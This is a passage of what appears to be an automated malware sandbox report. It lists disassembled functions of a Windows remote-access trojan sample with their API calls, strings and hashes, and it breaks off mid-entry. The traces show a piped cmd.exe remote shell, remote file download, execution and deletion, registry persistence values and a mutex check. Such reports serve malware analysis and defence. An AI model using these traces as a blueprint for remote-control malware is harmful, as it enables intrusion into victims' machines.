                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                        • String ID:
                        • API String ID: 3658366068-0
                        • Opcode ID: 7b4c4e1fc9e1a33e746d3ea038c7d733e0ecce283ed42e9dfa2e2b523637497c
                        • Instruction ID: 6857b948c75ecf5e4d11b49f17ebd09eceef1c2fbc6fc14a1e153603fddcf20a
                        • Opcode Fuzzy Hash: 7b4c4e1fc9e1a33e746d3ea038c7d733e0ecce283ed42e9dfa2e2b523637497c
                        • Instruction Fuzzy Hash: 7A212C71144B149FDB216B26EC45A27BBE1EF40325F104A7EF2E212AF1CB76E851DB48
                        Function 0040C89E Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1016 40c89e-40c8c3 call 401e52 1019 40c8c9 1016->1019 1020 40c9ed-40ca13 call 401e07 GetLongPathNameW call 403b40 1016->1020 1021 40c8d0-40c8d5 1019->1021 1022 40c9c2-40c9c7 1019->1022 1023 40c905-40c90a 1019->1023 1024 40c9d8 1019->1024 1025 40c9c9-40c9ce call 43ac1f 1019->1025 1026 40c8da-40c8e8 call 41a75b call 401e18 1019->1026 1027 40c8fb-40c900 1019->1027 1028 40c9bb-40c9c0 1019->1028 1029 40c90f-40c916 call 41b16b 1019->1029 1041 40ca18-40ca85 call 403b40 call 40cc37 call 402860 * 2 call 401e13 * 5 1020->1041 1031 40c9dd-40c9e2 call 43ac1f 1021->1031 1022->1031 1023->1031 1024->1031 1037 40c9d3-40c9d6 1025->1037 1050 40c8ed 1026->1050 1027->1031 1028->1031 1042 40c918-40c968 call 403b40 call 43ac1f call 403b40 call 402860 call 401e18 call 401e13 * 2 1029->1042 1043 40c96a-40c9b6 call 403b40 call 43ac1f call 403b40 call 402860 call 401e18 call 401e13 * 2 1029->1043 1044 40c9e3-40c9e8 call 4082d7 1031->1044 1037->1024 1037->1044 1055 40c8f1-40c8f6 call 401e13 1042->1055 1043->1050 1044->1020 1050->1055 1055->1020
                        APIs
                        • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040CA04
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: LongNamePath
                        • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                        • API String ID: 82841172-425784914
                        • Opcode ID: e65b7fd2f28b979a12418c5f5c2e2d29b720dc4ff9d72dd2f9df27909d96306d
                        • Instruction ID: a37aa742da7f535015bd00beacd4484d13b2c9c5bc690283ee024c69455bfc47
                        • Opcode Fuzzy Hash: e65b7fd2f28b979a12418c5f5c2e2d29b720dc4ff9d72dd2f9df27909d96306d
                        • Instruction Fuzzy Hash: 68413A721442009AC214F721DD97DAFB7A4AE90759F10063FB546720E2FE7CAA49C69F
                        Function 0041A473 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 59COMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                          • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                          • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                          • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                        • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4E9
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCurrentOpenProcessQueryValue
                        • String ID: (32 bit)$ (64 bit)$0JG$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                        • API String ID: 1866151309-3211212173
                        • Opcode ID: 9cf1f296616cdcd313259411c277503da338ecbad0565973079cd90fb6de65e1
                        • Instruction ID: ceb3f8158c83cee62a9ab3acf094014ca2543c25b31c887bfc35cbf025930a6e
                        • Opcode Fuzzy Hash: 9cf1f296616cdcd313259411c277503da338ecbad0565973079cd90fb6de65e1
                        • Instruction Fuzzy Hash: F611CAA050020566C704B765DC9BDBF765ADB90304F40453FB506E31D2EB6C8E8583EE
                        Function 004126D2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37registryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1169 4126d2-4126e9 RegCreateKeyA 1170 412722 1169->1170 1171 4126eb-412720 call 4022f8 call 401e8f RegSetValueExA RegCloseKey 1169->1171 1172 412724-412730 call 401eea 1170->1172 1171->1172
                        APIs
                        • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                        • RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                        • RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCreateValue
                        • String ID: HgF$pth_unenc
                        • API String ID: 1818849710-3662775637
                        • Opcode ID: 5060bd4906adf847476d1d6d5221a1eec7a3f5928a954e173dbc633271fad0d2
                        • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                        • Opcode Fuzzy Hash: 5060bd4906adf847476d1d6d5221a1eec7a3f5928a954e173dbc633271fad0d2
                        • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                        Function 004127D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31registryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1196 4127d5-4127eb RegCreateKeyA 1197 412818-41281b 1196->1197 1198 4127ed-412812 RegSetValueExA RegCloseKey 1196->1198 1198->1197 1199 412814-412817 1198->1199
                        APIs
                        • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                        • RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                        • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCreateValue
                        • String ID: TUF
                        • API String ID: 1818849710-3431404234
                        • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                        • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                        • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                        • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                        Function 0040BED7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1200 40bed7-40bf03 call 401e8f CreateMutexA GetLastError
                        APIs
                        • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                        • GetLastError.KERNEL32 ref: 0040BEF1
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateErrorLastMutex
                        • String ID: (CG
                        • API String ID: 1925916568-4210230975
                        • Opcode ID: 68001a27d0a1b5aca9f7806f756c118c8604acbb3141160e9eafa025ff823f9e
                        • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                        • Opcode Fuzzy Hash: 68001a27d0a1b5aca9f7806f756c118c8604acbb3141160e9eafa025ff823f9e
                        • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919
                        Function 00412513 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1203 412513-41253f RegOpenKeyExA 1204 412541-412567 RegQueryValueExA RegCloseKey 1203->1204 1205 412572 1203->1205 1204->1205 1206 412569-412570 1204->1206 1207 412577-412583 call 401f66 1205->1207 1206->1207
                        APIs
                        • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                        • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                        • RegCloseKey.KERNELBASE(?), ref: 0041255F
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpenQueryValue
                        • String ID:
                        • API String ID: 3677997916-0
                        • Opcode ID: fb0399a994eaa7e17bc6b867fc74c46ca573e9fca6dfde94924c7a451072e484
                        • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                        • Opcode Fuzzy Hash: fb0399a994eaa7e17bc6b867fc74c46ca573e9fca6dfde94924c7a451072e484
                        • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8
                        Function 004124B7 Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1210 4124b7-4124df RegOpenKeyExA 1211 4124e1-412509 RegQueryValueExA RegCloseKey 1210->1211 1212 41250f-412512 1210->1212 1211->1212 1213 41250b-41250e 1211->1213
                        APIs
                        • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                        • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                        • RegCloseKey.KERNELBASE(?), ref: 00412500
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpenQueryValue
                        • String ID:
                        • API String ID: 3677997916-0
                        • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                        • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                        • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                        • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98
                        Function 0041246E Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1214 41246e-41248d RegOpenKeyExA 1215 4124b2 1214->1215 1216 41248f-4124ac RegQueryValueExA RegCloseKey 1214->1216 1218 4124b4-4124b6 1215->1218 1216->1215 1217 4124ae-4124b0 1216->1217 1217->1218
                        APIs
                        • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
                        • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                        • RegCloseKey.KERNELBASE(?,?,?,0040B996,004660E0), ref: 004124A4
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpenQueryValue
                        • String ID:
                        • API String ID: 3677997916-0
                        • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                        • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                        • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                        • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
                        Function 00409517 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: _wcslen
                        • String ID: xAG
                        • API String ID: 176396367-2759412365
                        • Opcode ID: 67b639f6f502bf991f83ab0ee8fabe8b44a35461e942d099586b23cecd669b62
                        • Instruction ID: 06a27fc39790a6443aa461e0e984232ee7603be4cd8470566e0b89af9a4a2a71
                        • Opcode Fuzzy Hash: 67b639f6f502bf991f83ab0ee8fabe8b44a35461e942d099586b23cecd669b62
                        • Instruction Fuzzy Hash: FE1163329002059FCB15FF66D8969EF77A4EF64314B10453FF842622E2EF38A955CB98
                        Function 0044B9CE Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _free.LIBCMT ref: 0044B9EF
                          • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                        • RtlReAllocateHeap.NTDLL(00000000,00475D50,?,00000004,00000000,?,0044E91A,00475D50,00000004,?,00475D50,?,?,00443135,00475D50,?), ref: 0044BA2B
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap$_free
                        • String ID:
                        • API String ID: 1482568997-0
                        • Opcode ID: d76ce5d9e4c682b15a99abc110236e8d1a2fbccdd24d1d48a07619e1950cdef4
                        • Instruction ID: 4ec374b27fdcb4e51bf886fe72aa52163d481902fd3bbe85b5f84076fdb7f7cd
                        • Opcode Fuzzy Hash: d76ce5d9e4c682b15a99abc110236e8d1a2fbccdd24d1d48a07619e1950cdef4
                        • Instruction Fuzzy Hash: 0FF0C23260051166FB216E679C05F6B2B68DF827B0F15412BFD04B6291DF6CC80191ED
                        Function 004041F1 Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                        Download Yara Rule
                        APIs
                        • socket.WS2_32(?,00000001,00000006), ref: 00404212
                          • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateEventStartupsocket
                        • String ID:
                        • API String ID: 1953588214-0
                        • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                        • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                        • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                        • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
                        Function 0043361D Relevance: 3.0, APIs: 2, Instructions: 38COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DF7
                          • Part of subcall function 00437BE7: RaiseException.KERNEL32(?,?,00434421,?,?,?,?,?,?,?,?,00434421,?,0046D644,00404AD0), ref: 00437C47
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E14
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Exception@8Throw$ExceptionRaise
                        • String ID:
                        • API String ID: 3476068407-0
                        • Opcode ID: 268c4e751f198f59258c5df1bcef4ea0fc34f27caa05a39f735a57a931bd9370
                        • Instruction ID: a120e58b429b9861eb3006866c51ef53ea309f8249189fce9472b36b7df41f91
                        • Opcode Fuzzy Hash: 268c4e751f198f59258c5df1bcef4ea0fc34f27caa05a39f735a57a931bd9370
                        • Instruction Fuzzy Hash: EFF0243080430D7BCB14BEAAE80799D772C5D08319F60612BB825955E1EF7CE715C58E
                        Function 00446B0F Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: 9bddc84dc8664baa6f7cbd2250fb2f50dd1e52b915d866c7822d6cfd0d1e4f3c
                        • Instruction ID: 9aef8a7b80d5ef8cde78cc1a95e43686bba12cbd10c6cd592e8946dff14ce016
                        • Opcode Fuzzy Hash: 9bddc84dc8664baa6f7cbd2250fb2f50dd1e52b915d866c7822d6cfd0d1e4f3c
                        • Instruction Fuzzy Hash: 54E0E5312012B5A7FB202A6A9C05F5B7688DB437A4F060033AC45D66D0CB58EC4181AF
                        Function 00404262 Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                        Download Yara Rule
                        APIs
                        • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Startup
                        • String ID:
                        • API String ID: 724789610-0
                        • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                        • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                        • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                        • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                        Function 0042611E Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: send
                        • String ID:
                        • API String ID: 2809346765-0
                        • Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                        • Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
                        • Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                        • Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36

                        Non-executed Functions

                        Function 00406F06 Relevance: 46.3, APIs: 10, Strings: 16, Instructions: 849filesleepCOMMON
                        Download Yara Rule
                        APIs
                        • SetEvent.KERNEL32(?,?), ref: 00406F28
                        • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                        • DeleteFileW.KERNEL32(00000000), ref: 00407018
                          • Part of subcall function 0041B43F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B499
                          • Part of subcall function 0041B43F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4CB
                          • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B51C
                          • Part of subcall function 0041B43F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B571
                          • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B578
                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                          • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                          • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                          • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                          • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                          • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000), ref: 0040450E
                          • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                        • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                        • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                        • DeleteFileA.KERNEL32(?), ref: 004078CC
                          • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                          • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                          • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                        • Sleep.KERNEL32(000007D0), ref: 00407976
                        • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                          • Part of subcall function 0041BB87: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                        • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                        • API String ID: 2918587301-599666313
                        • Opcode ID: 6b0812c8d1b6409269fcb58b153d354c58b0a859e07f54bdc5fc8ea92fbea60e
                        • Instruction ID: 1bc88c7e1bb4371a25effcd92402389f4e4e7f2dfcf0a55fa2f5aa785e242239
                        • Opcode Fuzzy Hash: 6b0812c8d1b6409269fcb58b153d354c58b0a859e07f54bdc5fc8ea92fbea60e
                        • Instruction Fuzzy Hash: CC42A372A043005BC604F776C8979AF76A59F90718F40493FF946771E2EE3CAA09C69B
                        Function 00405042 Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 280pipesleepfileCOMMON
                        Download Yara Rule
                        APIs
                        • __Init_thread_footer.LIBCMT ref: 0040508E
                          • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
                          • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                        • __Init_thread_footer.LIBCMT ref: 004050CB
                        • CreatePipe.KERNEL32(00475D0C,00475CF4,00475C18,00000000,0046556C,00000000), ref: 0040515E
                        • CreatePipe.KERNEL32(00475CF8,00475D14,00475C18,00000000), ref: 00405174
                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C28,00475CFC), ref: 004051E7
                          • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
                          • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
                        • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                        • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                        • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                          • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                        • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                        • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                        • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                        • CloseHandle.KERNEL32 ref: 004053CD
                        • CloseHandle.KERNEL32 ref: 004053D5
                        • CloseHandle.KERNEL32 ref: 004053E7
                        • CloseHandle.KERNEL32 ref: 004053EF
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                        • String ID: (\G$SystemDrive$cmd.exe$p\G$p\G$p\G$p\G$p\G
                        • API String ID: 3815868655-1274243119
                        • Opcode ID: 8cbc04d304936592b8c30d8c5467e03ddebc48fda1e63d99d06426c92a2a1825
                        • Instruction ID: e174317c0cfdf92f2f57875e471bcaa01af682fbbee25a17085fe39bc952a1f7
                        • Opcode Fuzzy Hash: 8cbc04d304936592b8c30d8c5467e03ddebc48fda1e63d99d06426c92a2a1825
                        • Instruction Fuzzy Hash: 97910971504705AFD701BB25EC45A2F37A8EB84344F50443FF94ABA2E2DABC9D448B6E
                        Function 00410F36 Relevance: 33.5, APIs: 7, Strings: 12, Instructions: 238threadCOMMON
                        Download Yara Rule
                        APIs
